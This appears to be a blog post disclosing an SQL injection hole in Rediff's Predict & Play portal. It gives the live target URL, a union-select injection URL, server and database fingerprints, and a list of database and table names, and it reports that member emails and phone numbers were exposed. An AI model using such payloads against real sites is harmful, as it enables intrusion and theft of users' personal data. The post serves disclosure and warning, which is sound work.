Rediff’s Predict & Play Portal is Game for SQL Injection [Hack]

It seems hackers have got an easy hold of Rediff’s Predict & Play portal and are able to ‘predict & play’ with the entire database.

Dear Rediff,

It seems hackers have got an easy hold of your Predict & Play portal and are able to ‘predict & play’ with the entire database.

Target: http://predict.rediff.com
Server = Apacherediff predit play
Version = 5.1.30-log
Powered by = PHP/5.1.4
Current User = root@10.50.60.1
Current Database = predictwin
Union Columns = 15
Vuln Url : http://predict.rediff.com/member_profile.php?mem_id=-1+and+1=0+s
nion Select +UNHEX(HEX([visible])),2,3,4,5,6,7,8,9,10,11,12,13,14,15–

Database:
predictwin,information_schema, Ivsregistrationdb,Ivsserverdb, PREDICTSCRAPBOOK, crbt, db_stats, editorial, eterno, mboard_mod, mobilerediff, moderator, money
moneycomb1, moneycomb2,moneysearch,mysql,mysql_preupgrade_5_0,predictwin,relianceretail,test,

Current Database: predictwin
Table:
MemberMaster, Award_CricketPlayer,Award_EventMaster,Award_Group_Master, Award_MailLog, Award_MemberPredictions, Award_PredictionsMaster,Award_TagsMaster, Award_TransactionMaster,CricketPlayer,CricketPlayerStat,
CricketPlayerStatWC,CricketPlayerStat_indeng,CricketPlayerWC,CricketPlayer_indeng etc.

The hacker has even got hold of Member details [email id/mobile number/city data] and we suggest Rediff to plug the hole [just adds to your monday morning blues]

[via : Owasp, Pune mailing list]

Recommended Read: Note to Web Programmers – (Security) Hole in the Soul is Dangerous.

Sign Up for Our Newsletters

Get smarter with most important stories.

You May Also Like